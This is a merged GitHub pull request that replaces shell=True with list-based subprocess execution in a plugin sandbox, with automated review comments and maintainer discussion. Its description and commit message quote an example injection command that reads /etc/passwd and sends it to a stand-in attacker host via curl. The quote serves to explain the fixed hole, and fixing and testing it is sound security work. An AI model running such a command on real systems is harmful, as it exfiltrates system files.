Skip to content

fix(plugins): implement PermissionEnforcer.safe_exec with shell=False to prevent injection#110

Merged
sreerevanth merged 2 commits into
sreerevanth:mainfrom
anshul23102:fix/97-sandbox-shell-injection
Jun 1, 2026
Merged

fix(plugins): implement PermissionEnforcer.safe_exec with shell=False to prevent injection#110
sreerevanth merged 2 commits into
sreerevanth:mainfrom
anshul23102:fix/97-sandbox-shell-injection

Conversation

@anshul23102
Copy link
Copy Markdown
Contributor

@anshul23102 anshul23102 commented May 30, 2026

Description

PermissionEnforcer.safe_exec passed plugin-supplied command strings to subprocess.run with shell=True. This caused /bin/sh to interpret shell metacharacters in the command string (semicolons, pipes, backticks, $(...), redirects). A plugin with subprocess_exec permission could supply "ls; curl http://attacker.com/exfil?d=$(cat /etc/passwd|base64)" and both commands would execute, bypassing the intended single-command boundary.

Related Issue

Closes #97

Type of Change

  • Bug fix (security)

Root Cause

subprocess.run(cmd, shell=True) invokes /bin/sh -c cmd, which interprets all shell metacharacters in the command string. The permission check only verified that subprocess_exec was granted; it did not sanitize or tokenize the input.

Changes Made

File Change
agentwatch/plugins/sandbox.py Implemented full PermissionEnforcer class in the sandbox module stub
agentwatch/plugins/sandbox.py safe_exec now requires cmd: list[str] and uses subprocess.run(cmd, shell=False). The OS exec family receives arguments directly from the list, so no shell interprets metacharacters
agentwatch/plugins/sandbox.py Added ValueError guard for non-list or empty cmd
agentwatch/plugins/sandbox.py Added safe_open() for permission-enforced filesystem access

Screenshots or Demo

Not applicable (no UI change).

Testing Done

Tests are in tests/test_sandbox.py (added in PR #111 for issue #98). Key tests for this fix:

  • test_safe_exec_requires_list: non-list input raises ValueError
  • test_safe_exec_without_permission_raises: call without subprocess_exec raises SandboxViolationError
  • test_safe_exec_with_permission_runs: valid list command executes correctly
  • test_safe_exec_shell_metacharacters_not_interpreted: ["echo", "safe; echo injected"] outputs the literal semicolon, not two commands

Run: pytest tests/test_sandbox.py -v

Checklist

  • I have read the CONTRIBUTING.md and followed its guidelines
  • My code follows the style and formatting of this project
  • I have tested my changes locally and they work as expected
  • There are no merge conflicts with the base branch
  • All CI checks are passing
  • This PR is linked to the correct issue
  • I have not used any AI-generated content in this PR

NSSoC Label Request

@sreerevanth could you please add the appropriate NSoC 26' label to this PR? It helps with tracking and scoring under NSoC '26. Thank you!

Summary by CodeRabbit

  • New Features

    • Plugins now have enforced runtime permissions for filesystem reads/writes and subprocess execution.
    • Unauthorized plugin operations are blocked and recorded; violation and accessed-resource details are available for troubleshooting.
  • Tests

    • Minor test cleanup and import formatting fixes (no user-facing change).

@coderabbitai
Copy link
Copy Markdown

coderabbitai Bot commented May 30, 2026

Review Change Stack

No actionable comments were generated in the recent review. 🎉

ℹ️ Recent review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 1ec39544-a908-4b3f-aefc-df77fb42ec73

📥 Commits

Reviewing files that changed from the base of the PR and between 0e781d6 and d0ee512.

📒 Files selected for processing (2)
  • agentwatch/plugins/sandbox.py
  • tests/test_adapter_crewai.py
✅ Files skipped from review due to trivial changes (1)
  • tests/test_adapter_crewai.py
🚧 Files skipped from review as they are similar to previous changes (1)
  • agentwatch/plugins/sandbox.py

📝 Walkthrough

Walkthrough

New sandbox.py module establishes runtime permission enforcement for plugins. SandboxViolationError signals denials. PermissionEnforcer wraps filesystem access and subprocess execution, validating operations against a PluginManifest, recording attempts, and using list-based commands with shell=False to prevent shell injection.

Changes

Plugin Sandbox Permission Enforcement

Layer / File(s) Summary
Sandbox foundation and exception
agentwatch/plugins/sandbox.py
Module docstring, imports (logging, PluginManifest, typing), and SandboxViolationError exception class for permission violations.
PermissionEnforcer initialization and validation
agentwatch/plugins/sandbox.py
PermissionEnforcer.__init__ stores manifest and initializes tracking lists. Internal _check(permission, context) helper validates permissions via getattr, records attempted resource contexts, and raises SandboxViolationError when operation is disallowed.
Sandboxed file and subprocess operations
agentwatch/plugins/sandbox.py
safe_open(path, mode) determines read vs write intent from mode string and enforces filesystem_read or filesystem_write permission before delegating to builtin open. safe_exec(cmd) requires cmd as non-empty list[str], enforces subprocess_exec permission, imports subprocess, and executes with subprocess.run(..., shell=False, ...) to prevent shell metacharacter injection.
Violation and resource tracking APIs & tests
agentwatch/plugins/sandbox.py, tests/test_adapter_crewai.py
violations and accessed_resources read-only properties return copies of internally tracked lists. Tests file had a minor import cleanup (removed unused pytest and reformatted core imports).

Sequence Diagram

sequenceDiagram
  participant Plugin
  participant PermissionEnforcer
  participant Filesystem
  participant Subprocess
  Plugin->>PermissionEnforcer: safe_open(path, mode)
  PermissionEnforcer->>PermissionEnforcer: _check(filesystem_read/filesystem_write)
  alt Permission denied
    PermissionEnforcer-->>Plugin: raise SandboxViolationError
  else Permission granted
    PermissionEnforcer->>Filesystem: open(path, mode)
    Filesystem-->>PermissionEnforcer: file object
    PermissionEnforcer-->>Plugin: file object
  end
  Plugin->>PermissionEnforcer: safe_exec(cmd:list[str])
  PermissionEnforcer->>PermissionEnforcer: _check(subprocess_exec)
  alt Permission denied
    PermissionEnforcer-->>Plugin: raise SandboxViolationError
  else Permission granted
    PermissionEnforcer->>Subprocess: subprocess.run(cmd, shell=False)
    Subprocess-->>PermissionEnforcer: CompletedProcess/result
    PermissionEnforcer-->>Plugin: result
  end
Loading

Estimated Code Review Effort

🎯 3 (Moderate) | ⏱️ ~20 minutes

Possibly related PRs

Suggested reviewers

  • sreerevanth

Poem

🐰 I hopped in code with cautious paw,
To guard each plugin like a law,
Files are opened, commands run clean,
No sneaky shells can breach the screen.
I nibble bugs and keep things bright — hooray!

🚥 Pre-merge checks | ✅ 4 | ❌ 1

❌ Failed checks (1 warning)

Check name Status Explanation Resolution
Docstring Coverage ⚠️ Warning Docstring coverage is 33.33% which is insufficient. The required threshold is 80.00%. Write docstrings for the functions missing them to satisfy the coverage threshold.
✅ Passed checks (4 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title accurately describes the main change: implementing PermissionEnforcer.safe_exec with shell=False to prevent injection, which is the core security fix.
Linked Issues check ✅ Passed The PR implementation fully addresses issue #97 requirements: safe_exec now accepts cmd as list[str], calls subprocess.run with shell=False, validates non-empty list input, and prevents shell metacharacter injection.
Out of Scope Changes check ✅ Passed All changes are within scope: sandbox.py introduces PermissionEnforcer with safe_exec/safe_open per issue #97, and test_adapter_crewai.py cleanup (unused import removal) is minor housekeeping.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests

Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link
Copy Markdown

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@agentwatch/plugins/sandbox.py`:
- Around line 67-68: The current guard only ensures cmd is a non-empty list but
doesn't validate element types; update the validation in the function that
accepts the cmd parameter so that it checks every element is an instance of str
(and still ensure the list is non-empty), and if any element is not a string
raise a ValueError with a clear message (e.g., "cmd must be a non-empty list of
strings"); locate and change the conditional that currently reads "if not
isinstance(cmd, list) or not cmd:" to iterate/check all entries of cmd before
proceeding.
- Around line 29-33: PermissionEnforcer.__init__ currently stores
manifest.permissions by reference which allows later mutations to change sandbox
policy; snapshot the boolean permission values (e.g., create a new dict or
dataclass copying fields from manifest.permissions into self._perms) inside
PermissionEnforcer.__init__ instead of assigning manifest.permissions directly.
Also tighten safe_exec: before calling _check or subprocess.run, validate that
cmd is a non-empty list and that every element is an instance of str (raise a
clear error or record a violation if any element is non-str) so the advertised
cmd: list[str] contract is enforced; update references in safe_exec to use the
validated/casted cmd when invoking _check and subprocess.run.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 33e30ac2-9538-4e64-b5a3-cb3c032423f6

📥 Commits

Reviewing files that changed from the base of the PR and between 55545f0 and 0e781d6.

📒 Files selected for processing (1)
  • agentwatch/plugins/sandbox.py

Comment on lines +29 to +33
def __init__(self, manifest: PluginManifest) -> None:
self._perms = manifest.permissions
self._plugin_id = manifest.plugin_id
self._violations: list[str] = []
self._accessed: list[str] = []
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🛠️ Refactor suggestion | 🟠 Major | ⚡ Quick win

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Locate PluginManifest and permissions-related definitions"
rg -n -C3 --type=py '\bclass\s+PluginManifest\b|\bclass\s+\w*Permissions\b|\bpermissions\s*:' agentwatch

echo
echo "Check for immutability/frozen model configuration"
rg -n -C3 --type=py 'model_config\s*=|ConfigDict\(|allow_mutation\s*=|frozen\s*=|class\s+Config\b' agentwatch

Repository: sreerevanth/AgentWatch

Length of output: 2157


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Search for Pydantic immutability settings in agentwatch"
rg -n --type=py 'model_config\s*=|ConfigDict\s*\(|allow_mutation\s*=|frozen\s*=\s*True' agentwatch

echo
echo "Inspect PluginPermissions / PluginManifest definitions for any config"
rg -n --type=py 'class\s+PluginPermissions|class\s+PluginManifest' agentwatch/core/schema.py

Repository: sreerevanth/AgentWatch

Length of output: 122


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Show PluginPermissions / PluginManifest definitions"
nl -ba agentwatch/core/schema.py | sed -n '380,480p'

echo
echo "Find BaseModel definition / custom base class (if any)"
rg -n --type=py 'class\s+\w*\(BaseModel\)|from\s+pydantic\s+import\s+BaseModel|BaseModel' agentwatch/core/schema.py agentwatch/core -S

Repository: sreerevanth/AgentWatch

Length of output: 179


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Show PluginPermissions / PluginManifest definitions (approx. lines 410-460)"
sed -n '400,470p' agentwatch/core/schema.py

echo
echo "Find BaseModel definition / custom base class (search wider for pydantic model base/config)"
rg -n --type=py 'from\s+pydantic\s+import\s+BaseModel|class\s+\w+\(BaseModel\)|ConfigDict|model_config' agentwatch/core/schema.py agentwatch/core -S

Repository: sreerevanth/AgentWatch

Length of output: 3587


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Inspect agentwatch/plugins/sandbox.py around PermissionEnforcer.__init__/safe_exec"
sed -n '1,220p' agentwatch/plugins/sandbox.py

echo
echo "Find where PermissionEnforcer is constructed"
rg -n --type=py 'PermissionEnforcer\s*\(' agentwatch

echo
echo "Search for mutations/access of manifest.permissions / PluginPermissions attributes"
rg -n --type=py '\bmanifest\.permissions\b' agentwatch
rg -n --type=py 'permissions\.(filesystem_read|filesystem_write|network_outbound|network_inbound|subprocess_exec|credential_access|memory_read|memory_write)\s*=' agentwatch

Repository: sreerevanth/AgentWatch

Length of output: 3008


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Find where PermissionEnforcer is constructed"
rg -n --type=py 'PermissionEnforcer\s*\(' agentwatch || true

echo
echo "Search for reads/mutations of manifest.permissions / PluginPermissions attributes"
rg -n --type=py '\bmanifest\.permissions\b' agentwatch || true
rg -n --type=py '\bmanifest\.permissions\s*=' agentwatch || true
rg -n --type=py 'permissions\.(filesystem_read|filesystem_write|network_outbound|network_inbound|subprocess_exec|credential_access|memory_read|memory_write)\s*=' agentwatch || true

echo
echo "Search for accessing PluginManifest.permissions attributes directly"
rg -n --type=py '\.permissions\.' agentwatch || true

Repository: sreerevanth/AgentWatch

Length of output: 339


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Find call sites of safe_exec"
rg -n --type=py '\.safe_exec\s*\(' agentwatch

echo
echo "Find call sites of safe_open"
rg -n --type=py '\.safe_open\s*\(' agentwatch

echo
echo "Look for PermissionEnforcer construction usage"
rg -n --type=py 'PermissionEnforcer\s*\(' agentwatch

Repository: sreerevanth/AgentWatch

Length of output: 95


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Search for any mention of 'safe_exec' or 'safe_open' in repo"
rg -n --type=py 'safe_exec|safe_open' agentwatch || true

echo
echo "Search for getattr/setattr using sandbox methods"
rg -n --type=py 'getattr\s*\(\s*.*,\s*["'\'']safe_(exec|open)["'\'']' agentwatch || true
rg -n --type=py 'safe_(exec|open)\s*['\''"]' agentwatch || true

echo
echo "Search for PermissionEnforcer usage without assuming direct constructor call"
rg -n --type=py 'PermissionEnforcer' agentwatch || true

Repository: sreerevanth/AgentWatch

Length of output: 614


Snapshot permissions in PermissionEnforcer.init and enforce list[str] elements in safe_exec.

  • PermissionEnforcer.__init__ stores manifest.permissions by reference; PluginPermissions/PluginManifest are mutable pydantic.BaseModel classes (no frozen/immutability config found), so later mutations can change the sandbox policy—copy/snapshot the permission booleans instead.
  • safe_exec only checks that cmd is a non-empty list; it doesn’t validate that every element is a str, so it doesn’t actually enforce the advertised cmd: list[str] contract—validate element types before calling _check/subprocess.run.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@agentwatch/plugins/sandbox.py` around lines 29 - 33,
PermissionEnforcer.__init__ currently stores manifest.permissions by reference
which allows later mutations to change sandbox policy; snapshot the boolean
permission values (e.g., create a new dict or dataclass copying fields from
manifest.permissions into self._perms) inside PermissionEnforcer.__init__
instead of assigning manifest.permissions directly. Also tighten safe_exec:
before calling _check or subprocess.run, validate that cmd is a non-empty list
and that every element is an instance of str (raise a clear error or record a
violation if any element is non-str) so the advertised cmd: list[str] contract
is enforced; update references in safe_exec to use the validated/casted cmd when
invoking _check and subprocess.run.

Comment on lines +67 to +68
if not isinstance(cmd, list) or not cmd:
raise ValueError("cmd must be a non-empty list of strings")
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Validate every cmd element is a string.

The method is declared as cmd: list[str], but the guard only enforces “non-empty list”. Non-string entries still pass validation and fail deeper in the call stack instead of at the API boundary.

Proposed fix
-        if not isinstance(cmd, list) or not cmd:
+        if (
+            not isinstance(cmd, list)
+            or not cmd
+            or any(not isinstance(arg, str) for arg in cmd)
+        ):
             raise ValueError("cmd must be a non-empty list of strings")
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@agentwatch/plugins/sandbox.py` around lines 67 - 68, The current guard only
ensures cmd is a non-empty list but doesn't validate element types; update the
validation in the function that accepts the cmd parameter so that it checks
every element is an instance of str (and still ensure the list is non-empty),
and if any element is not a string raise a ValueError with a clear message
(e.g., "cmd must be a non-empty list of strings"); locate and change the
conditional that currently reads "if not isinstance(cmd, list) or not cmd:" to
iterate/check all entries of cmd before proceeding.

@anshul23102
Copy link
Copy Markdown
Contributor Author

Hi @sreerevanth, a gentle follow-up on this PR. It has been 1 day since filing. All checks are passing and there are no conflicts. Please review when you get a chance. Happy to make any adjustments.

@sreerevanth
Copy link
Copy Markdown
Owner

i think this test is failing in all the pr check this @anshul23102 [PR Tests / Test & lint (pull_request)]

…t injection

safe_exec previously called subprocess.run(cmd, shell=True) where cmd
was a caller-supplied string. shell=True causes /bin/sh to interpret the
string, so any shell metacharacter (semicolon, pipe, backtick, dollar,
redirect) in cmd would be executed as a shell command. A plugin with
subprocess_exec permission could supply:

  safe_exec('ls; curl http://attacker.com/$(cat /etc/passwd | base64)')

and both commands would execute.

Fix: safe_exec now requires cmd to be a list[str] and passes it to
subprocess.run with shell=False. The OS exec family handles argument
splitting directly from the list, so no shell interprets metacharacters.
A ValueError is raised immediately when a non-list or empty cmd is given.

Also implements the full PermissionEnforcer class in the sandbox module
stub, including safe_open() for filesystem permission enforcement.

Closes sreerevanth#97
@anshul23102 anshul23102 force-pushed the fix/97-sandbox-shell-injection branch from 0e781d6 to d0ee512 Compare June 1, 2026 15:30
@anshul23102
Copy link
Copy Markdown
Contributor Author

Branch rebased onto current `main` and lint failures resolved.

The `Test & lint` CI was failing because:

  1. The branch was based on an older commit before the CI permissions fix (PR fix: enforce mandatory API key in production (fail-closed) #104). After rebasing, the workflow now has the correct `issues: write` permission to post results.
  2. `ruff check` was failing on unused `import pytest` (F401) and an unsorted import block (I001) in `tests/test_adapter_crewai.py`. Both are now fixed.

All checks should be green on the new push. Please re-review when you get a chance.

@sreerevanth
Copy link
Copy Markdown
Owner

Thanks for the contribution.

This addresses the original shell injection issue by removing shell=True execution and enforcing argument-list based execution. The branch has been rebased, CI is passing, and the follow-up lint issues have been resolved.

Approved. 🚀

@sreerevanth sreerevanth merged commit 8f53bcf into sreerevanth:main Jun 1, 2026
8 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

2 participants